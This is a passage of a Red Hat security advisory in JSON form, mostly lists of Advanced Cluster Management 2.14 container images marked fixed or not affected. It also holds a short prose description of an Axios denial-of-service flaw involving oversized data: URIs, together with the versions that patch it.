"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "Axios is a promise based HTTP client for the browser and Node.js. When Axios prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: \u0027stream\u0027`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
